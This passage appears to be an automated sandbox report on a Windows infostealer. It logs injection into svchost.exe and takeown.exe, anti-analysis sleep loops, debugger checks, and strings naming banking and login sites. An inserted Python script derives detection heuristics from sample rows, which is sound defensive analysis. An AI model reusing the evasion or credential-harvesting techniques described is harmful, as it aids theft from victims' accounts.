Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00395376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00333187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00333187
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | API/Special instruction interceptor: Address: 31A3224
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60D324
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60D7E4
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60D944
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60D504
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60D544
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60D1E4
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B610154
Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FFC1B60DA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0377096E rdtsc
Source: C:\Windows\SysWOW64\takeown.exe | Window / User API: threadDelayed 1912
Source: C:\Windows\SysWOW64\takeown.exe | Window / User API: threadDelayed 8058
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
Source: C:\Windows\SysWOW64\takeown.exe | API coverage: 2.7 %
Source: C:\Windows\SysWOW64\takeown.exe TID: 5716 | Thread sleep count: 1912 > 30
Source: C:\Windows\SysWOW64\takeown.exe TID: 5716 | Thread sleep time: -3824000s >= -30000s
Source: C:\Windows\SysWOW64\takeown.exe TID: 5716 | Thread sleep count: 8058 > 30
Source: C:\Windows\SysWOW64\takeown.exe TID: 5716 | Thread sleep time: -16116000s >= -30000s
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe TID: 5920 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\takeown.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\takeown.exe | Last function: Thread delayed
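The rows above encode three verdicts that a detection engineer would want to reproduce outside the sandbox: the process tree (a user-profile EXE starting svchost.exe, then takeown.exe starting Firefox), the credential-store DLLs pulled into takeown.exe (winsqlite3.dll plus vaultcli.dll), and the sleep loop in thread 5716 that is meant to outlast the analysis window. The script below is an added example, not Joe Sandbox code, and re-derives those verdicts from constructed rows. It assumes a one-event-per-line format of the form "Source: <process>[ TID: n] | <Kind>: <detail>", assumes 2000 ms per sleep call (1912 calls x 2000 ms = 3824000 ms, the figure the report prints), and takes its thresholds from the report's own "> 30" and ">= 30000" comparisons; the services.exe row is a benign control case.

```python
"""Re-derive three sandbox verdicts from behaviour rows (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict

# Constructed rows, modelled on the rows in this report. Assumed format:
# "Source: <process>[ TID: n] | <Kind>: <detail>". The services.exe row is a
# benign control; the 2000 ms per sleep call is an assumption (1912 * 2000 = 3824000).
EVENTS = r"""
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Process created: C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\takeown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\services.exe | Process created: C:\Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wininet.dll
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\takeown.exe TID: 5716 | Thread sleep: count=1912 each_ms=2000
Source: C:\Windows\SysWOW64\takeown.exe TID: 5716 | Thread sleep: count=8058 each_ms=2000
Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe TID: 5920 | Thread sleep: count=1 each_ms=35000
"""

ROW = re.compile(r"^Source: (?P<src>.+?)(?: TID: (?P<tid>\d+))? \| (?P<kind>[^:|]+): (?P<rest>.+)$")

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
BROWSER_LAUNCHERS = {"explorer.exe", "cmd.exe", "powershell.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
CRED_STORE_DLLS = {"winsqlite3.dll", "vaultcli.dll"}


def parse_rows(text):
    """Parse rows into dicts; an unparsable row is an error, not a silent drop."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unparsable row: {line!r}")
        row = m.groupdict()
        row["tid"] = int(row["tid"]) if row["tid"] else None
        rows.append(row)
    return rows


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def process_tree_findings(rows):
    """Parent/child pairs that do not occur on a healthy host."""
    findings = []
    for r in rows:
        if r["kind"] != "Process created":
            continue
        parent, child = image_name(r["src"]), image_name(r["rest"])
        # A genuine svchost.exe is only started by services.exe; one started by
        # a user-profile EXE is a host process for injected code.
        if child == "svchost.exe" and parent != "services.exe":
            findings.append(("svchost_bad_parent", r["src"], r["rest"]))
        # A System32/SysWOW64 utility that is not a shell has no reason to
        # launch a browser; here takeown.exe does so to reach browser data.
        if (child in BROWSERS and r["src"].lower().startswith(SYSTEM_DIRS)
                and parent not in BROWSER_LAUNCHERS):
            findings.append(("system_util_spawns_browser", r["src"], r["rest"]))
    return findings


def credential_store_loaders(rows):
    """Non-browser processes that load both the SQLite and Credential Vault client DLLs."""
    loaded = defaultdict(set)
    for r in rows:
        if r["kind"] == "Section loaded":
            loaded[r["src"]].add(r["rest"].lower())
    return sorted(proc for proc, dlls in loaded.items()
                  if CRED_STORE_DLLS <= dlls and image_name(proc) not in BROWSERS)


def sleep_loop_findings(rows, max_calls=30, max_total_ms=30_000):
    """Aggregate sleeps per thread; flag with the report's thresholds
    (more than 30 calls, or at least 30 s in total)."""
    per_thread = defaultdict(lambda: [0, 0])
    for r in rows:
        if r["kind"] != "Thread sleep":
            continue
        fields = dict(kv.split("=") for kv in r["rest"].split())
        count, each_ms = int(fields["count"]), int(fields["each_ms"])
        stats = per_thread[(r["src"], r["tid"])]
        stats[0] += count
        stats[1] += count * each_ms
    return {key: {"calls": c, "total_ms": t, "flagged": c > max_calls or t >= max_total_ms}
            for key, (c, t) in per_thread.items()}


if __name__ == "__main__":
    rows = parse_rows(EVENTS)
    for finding in process_tree_findings(rows):
        print("process tree:", finding)
    print("credential-store loaders:", credential_store_loaders(rows))
    for key, stats in sleep_loop_findings(rows).items():
        print("sleep loop:", key, stats)
```

The sleep heuristic is deliberately cumulative per thread: a single 35 s sleep and nine thousand 2 s sleeps both cross the 30 s line, which is why the report flags both thread 5716 and thread 5920. The services.exe row shows the tree check is keyed on the parent, not on the name svchost.exe alone.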
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_0258C380 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 1f2Wt16K.3.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 1f2Wt16K.3.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 1f2Wt16K.3.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: AMC password management pageVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 1f2Wt16K.3.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 1f2Wt16K.3.dr | Binary or memory string: discord.comVMware20,11696492231f
Source: takeown.exe, 00000003.00000003.1265801658.0000000007756000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,116
Source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1f2Wt16K.3.dr | Binary or memory string: global block list test formVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 1f2Wt16K.3.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 1f2Wt16K.3.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 1f2Wt16K.3.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 1f2Wt16K.3.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 1f2Wt16K.3.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 1f2Wt16K.3.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 1f2Wt16K.3.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3329709800.0000000000769000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 1f2Wt16K.3.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 1f2Wt16K.3.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 1f2Wt16K.3.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 1f2Wt16K.3.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: firefox.exe, 0000000A.00000002.1378188187.000002445532C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\takeown.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0377096E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004172E3 LdrLoadDll
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00383F09 BlockInput
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B3A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00345A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00345A7C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00314B37 LoadLibraryA,GetProcAddress,0_2_00314B37
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_031A3490 mov eax, dword ptr fs:[00000030h] | 0_2_031A3490
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_031A34F0 mov eax, dword ptr fs:[00000030h] | 0_2_031A34F0
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_031A1E70 mov eax, dword ptr fs:[00000030h] | 0_2_031A1E70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D437C mov eax, dword ptr fs:[00000030h] | 1_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h] | 1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h] | 1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h] | 1_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h] | 1_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h] | 1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h] | 1_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h] | 1_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h] | 1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037663FF mov eax, dword ptr fs:[00000030h] | 1_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h] | 1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h] | 1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h] | 1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h] | 1_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h] | 1_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h] | 1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h] | 1_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h] | 1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h] | 1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0375438F mov eax, dword ptr fs:[00000030h] | 1_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h] | 1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h] | 1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372826B mov eax, dword ptr fs:[00000030h] | 1_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h] | 1_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03736259 mov eax, dword ptr fs:[00000030h] | 1_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h] | 1_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h] | 1_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h] | 1_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372823B mov eax, dword ptr fs:[00000030h] | 1_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h] | 1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h] | 1_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h] | 1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h] | 1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h] | 1_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h] | 1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h] | 1_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h] | 1_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03736154 mov eax, dword ptr fs:[00000030h] | 1_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h] | 1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h] | 1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03760124 mov eax, dword ptr fs:[00000030h] | 1_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h] | 1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h] | 1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h] | 1_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h] | 1_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h] | 1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h] | 1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h] | 1_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h] | 1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h] | 1_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h] | 1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03804164 mov eax, dword ptr fs:[00000030h] | 1_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h] | 1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03770185 mov eax, dword ptr fs:[00000030h] | 1_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h] | 1_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h] | 1_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h] | 1_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03732050 mov eax, dword ptr fs:[00000030h] | 1_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h] | 1_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h] | 1_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h] | 1_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h] | 1_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h] | 1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h] | 1_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h] | 1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h] | 1_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h] | 1_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h] | 1_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h] | 1_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h] | 1_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h] | 1_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h] | 1_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h] | 1_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h] | 1_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0373208A mov eax, dword ptr fs:[00000030h] | 1_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03738770 mov eax, dword ptr fs:[00000030h] | 1_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h] | 1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03730750 mov eax, dword ptr fs:[00000030h] | 1_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h] | 1_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h] | 1_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h] | 1_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376674D mov esi, dword ptr fs:[00000030h] | 1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h] | 1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h] | 1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h] | 1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h] | 1_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h] | 1_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03730710 mov eax, dword ptr fs:[00000030h] | 1_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03760710 mov eax, dword ptr fs:[00000030h] | 1_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h] | 1_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h] | 1_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h] | 1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h] | 1_2_037BE7E1
